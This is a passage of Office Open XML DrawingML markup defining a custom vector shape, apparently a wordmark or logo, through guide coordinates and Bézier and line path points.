                <a:gd name="connsiteX56" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY56" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX57" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY57" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX58" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY58" fmla="*/ 331283 h 941357"/>
                <a:gd name="connsiteX59" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY59" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX60" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY60" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX61" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY61" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX62" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY62" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX63" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY63" fmla="*/ 692121 h 941357"/>
                <a:gd name="connsiteX64" fmla="*/ 2616030 w 4182422"/>
                <a:gd name="connsiteY64" fmla="*/ 866968 h 941357"/>
                <a:gd name="connsiteX65" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY65" fmla="*/ 941357 h 941357"/>
                <a:gd name="connsiteX66" fmla="*/ 2226352 w 4182422"/>
                <a:gd name="connsiteY66" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX67" fmla="*/ 2336114 w 4182422"/>
                <a:gd name="connsiteY67" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX68" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY68" fmla="*/ 844657 h 941357"/>
                <a:gd name="connsiteX69" fmla="*/ 2522107 w 4182422"/>
                <a:gd name="connsiteY69" fmla="*/ 797229 h 941357"/>
                <a:gd name="connsiteX70" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY70" fmla="*/ 705141 h 941357"/>
                <a:gd name="connsiteX71" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY71" fmla="*/ 688403 h 941357"/>
                <a:gd name="connsiteX72" fmla="*/ 2401201 w 4182422"/>
                <a:gd name="connsiteY72" fmla="*/ 737714 h 941357"/>
                <a:gd name="connsiteX73" fmla="*/ 2191955 w 4182422"/>
                <a:gd name="connsiteY73" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX74" fmla="*/ 2204978 w 4182422"/>
                <a:gd name="connsiteY74" fmla="*/ 416857 h 941357"/>
                <a:gd name="connsiteX75" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY75" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX76" fmla="*/ 338260 w 4182422"/>
                <a:gd name="connsiteY76" fmla="*/ 189573 h 941357"/>
                <a:gd name="connsiteX77" fmla="*/ 245317 w 4182422"/>
                <a:gd name="connsiteY77" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX78" fmla="*/ 431200 w 4182422"/>
                <a:gd name="connsiteY78" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX79" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY79" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX80" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY80" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX81" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY81" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX82" fmla="*/ 1715247 w 4182422"/>
                <a:gd name="connsiteY82" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX83" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY83" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX84" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY84" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX85" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY85" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX86" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY86" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX87" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY87" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX88" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY88" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX89" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY89" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX90" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY90" fmla="*/ 558285 h 941357"/>
                <a:gd name="connsiteX91" fmla="*/ 3285320 w 4182422"/>
                <a:gd name="connsiteY91" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX92" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY92" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX93" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY93" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX94" fmla="*/ 3284381 w 4182422"/>
                <a:gd name="connsiteY94" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX95" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY95" fmla="*/ 580595 h 941357"/>
                <a:gd name="connsiteX96" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY96" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX97" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY97" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX98" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY98" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX99" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY99" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX100" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY100" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX101" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY101" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX102" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY102" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX103" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY103" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX104" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY104" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX105" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY105" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX106" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY106" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX107" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY107" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX108" fmla="*/ 275065 w 4182422"/>
                <a:gd name="connsiteY108" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX109" fmla="*/ 401442 w 4182422"/>
                <a:gd name="connsiteY109" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX110" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY110" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX111" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY111" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX112" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY112" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX113" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY113" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX114" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY114" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX115" fmla="*/ 501792 w 4182422"/>
                <a:gd name="connsiteY115" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX116" fmla="*/ 468335 w 4182422"/>
                <a:gd name="connsiteY116" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX117" fmla="*/ 209085 w 4182422"/>
                <a:gd name="connsiteY117" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX118" fmla="*/ 175639 w 4182422"/>
                <a:gd name="connsiteY118" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX119" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY119" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX120" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY120" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX121" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY121" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX122" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY122" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX123" fmla="*/ 52059 w 4182422"/>
                <a:gd name="connsiteY123" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX124" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY124" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX125" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY125" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX126" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY126" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX127" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY127" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX128" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY128" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX129" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY129" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX130" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY130" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX131" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY131" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX132" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY132" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX133" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY133" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX134" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY134" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX135" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY135" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX136" fmla="*/ 1736636 w 4182422"/>
                <a:gd name="connsiteY136" fmla="*/ 147236 h 941357"/>
                <a:gd name="connsiteX137" fmla="*/ 1839860 w 4182422"/>
                <a:gd name="connsiteY137" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX138" fmla="*/ 1831511 w 4182422"/>
                <a:gd name="connsiteY138" fmla="*/ 489482 h 941357"/>
                <a:gd name="connsiteX139" fmla="*/ 1686412 w 4182422"/>
                <a:gd name="connsiteY139" fmla="*/ 692212 h 941357"/>
                <a:gd name="connsiteX140" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY140" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX141" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY141" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX142" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY142" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX143" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY143" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX144" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY144" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX145" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY145" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX146" fmla="*/ 750838 w 4182422"/>
                <a:gd name="connsiteY146" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX147" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY147" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX148" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY148" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX149" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY149" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX150" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY150" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX151" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY151" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX152" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY152" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX153" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY153" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX154" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY154" fmla="*/ 99437 h 941357"/>
                <a:gd name="connsiteX155" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY155" fmla="*/ 140311 h 941357"/>
                <a:gd name="connsiteX156" fmla="*/ 597510 w 4182422"/>
                <a:gd name="connsiteY156" fmla="*/ 66914 h 94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182422" h="941357">
                  <a:moveTo>
                    <a:pt x="3600394" y="545242"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3534369" y="545242"/>
                    <a:pt x="3512056" y="559193"/>
                    <a:pt x="3512056" y="599184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3512056" y="607533"/>
                    <a:pt x="3513935" y="615910"/>
                    <a:pt x="3516701" y="622437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3525078" y="643806"/>
                    <a:pt x="3544625" y="651261"/>
                    <a:pt x="3588311" y="651261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3634816" y="651261"/>
                    <a:pt x="3666445" y="641940"/>
                    <a:pt x="3687819" y="623348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3701781" y="611250"/>
                    <a:pt x="3705512" y="601959"/>
                    <a:pt x="3705512" y="574988"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3705512" y="549872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3675736" y="547095"/>
                    <a:pt x="3629231" y="545242"/>
                    <a:pt x="3600394" y="545242"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2419807" y="371294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2405871" y="371294"/>
                    <a:pt x="2391910" y="374071"/>
                    <a:pt x="2380740" y="378729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2336114" y="397323"/>
                    <a:pt x="2311948" y="443828"/>
                    <a:pt x="2311948" y="507071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2311948" y="525663"/>
                    <a:pt x="2314715" y="544255"/>
                    <a:pt x="2319386" y="560072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2332383" y="606576"/>
                    <a:pt x="2371450" y="635403"/>
                    <a:pt x="2421660" y="635403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2490503" y="635403"/>
                    <a:pt x="2536069" y="585180"/>
                    <a:pt x="2536069" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536069" y="425236"/>
                    <a:pt x="2490503" y="371294"/>
                    <a:pt x="2419807" y="371294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2771158" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771158" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1904769" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904769" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3615295" y="270888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3639461" y="270888"/>
                    <a:pt x="3663653" y="272754"/>
                    <a:pt x="3685026" y="275531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748260" y="284849"/>
                    <a:pt x="3789179" y="311820"/>
                    <a:pt x="3807787" y="357386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3818956" y="383415"/>
                    <a:pt x="3822687" y="412239"/>
                    <a:pt x="3822687" y="468045"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3822687" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="693107"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3676675" y="732155"/>
                    <a:pt x="3630170" y="749825"/>
                    <a:pt x="3563206" y="749825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3454382" y="749825"/>
                    <a:pt x="3393942" y="697747"/>
                    <a:pt x="3393942" y="603815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3393942" y="549872"/>
                    <a:pt x="3414402" y="508970"/>
                    <a:pt x="3452529" y="483862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479488" y="467124"/>
                    <a:pt x="3525078" y="457833"/>
                    <a:pt x="3587372" y="457833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3649691" y="459686"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3657129" y="459686"/>
                    <a:pt x="3686880" y="461552"/>
                    <a:pt x="3702694" y="462463"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3702694" y="442018"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3702694" y="409462"/>
                    <a:pt x="3699927" y="399230"/>
                    <a:pt x="3690611" y="388076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3677589" y="374114"/>
                    <a:pt x="3651570" y="366677"/>
                    <a:pt x="3612503" y="366677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3605065" y="366677"/>
                    <a:pt x="3597628" y="366677"/>
                    <a:pt x="3590190" y="367618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3554829" y="372259"/>
                    <a:pt x="3543685" y="383415"/>
                    <a:pt x="3539954" y="420619"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3430216" y="420619"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3433922" y="312734"/>
                    <a:pt x="3485098" y="270888"/>
                    <a:pt x="3615295" y="270888"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2404018" y="269903"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2464433" y="269903"/>
                    <a:pt x="2504439" y="286662"/>
                    <a:pt x="2547213" y="331283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2547213" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="692121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2654158" y="785132"/>
                    <a:pt x="2644867" y="826977"/>
                    <a:pt x="2616030" y="866968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2578842" y="918134"/>
                    <a:pt x="2518376" y="941357"/>
                    <a:pt x="2423513" y="941357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2284025" y="941357"/>
                    <a:pt x="2230083" y="899512"/>
                    <a:pt x="2226352" y="789773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2336114" y="789773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342638" y="831637"/>
                    <a:pt x="2363987" y="844657"/>
                    <a:pt x="2423513" y="844657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2476542" y="844657"/>
                    <a:pt x="2505379" y="830695"/>
                    <a:pt x="2522107" y="797229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2533251" y="774899"/>
                    <a:pt x="2536069" y="754443"/>
                    <a:pt x="2536069" y="705141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2536069" y="688403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2492356" y="724675"/>
                    <a:pt x="2456057" y="737714"/>
                    <a:pt x="2401201" y="737714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2275648" y="737714"/>
                    <a:pt x="2191955" y="646557"/>
                    <a:pt x="2191955" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2191955" y="476381"/>
                    <a:pt x="2196626" y="445691"/>
                    <a:pt x="2204978" y="416857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2231936" y="325711"/>
                    <a:pt x="2307278" y="269903"/>
                    <a:pt x="2404018" y="269903"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="338260" y="189573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245317" y="446957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431200" y="446957"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1408353" y="168636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1408353" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469732" y="635494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1624121" y="635494"/>
                    <a:pt x="1715247" y="549006"/>
                    <a:pt x="1715247" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715247" y="256063"/>
                    <a:pt x="1624121" y="168636"/>
                    <a:pt x="1469732" y="168636"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3116056" y="135153"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="135153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="558285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3233231" y="619662"/>
                    <a:pt x="3243486" y="634537"/>
                    <a:pt x="3285320" y="635479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="635479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="736848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284381" y="736848"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3167206" y="736848"/>
                    <a:pt x="3116056" y="690343"/>
                    <a:pt x="3116056" y="580595"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="283019"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2833452" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833452" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1967060" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967060" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275065" y="67826"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401442" y="67826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501792" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468335" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209085" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175639" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52059" y="635588"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3936902" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="67265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936902" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1221438" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1475304" y="67265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1593431" y="67265"/>
                    <a:pt x="1673403" y="91441"/>
                    <a:pt x="1736636" y="147236"/>
                  </a:cubicBezTo>
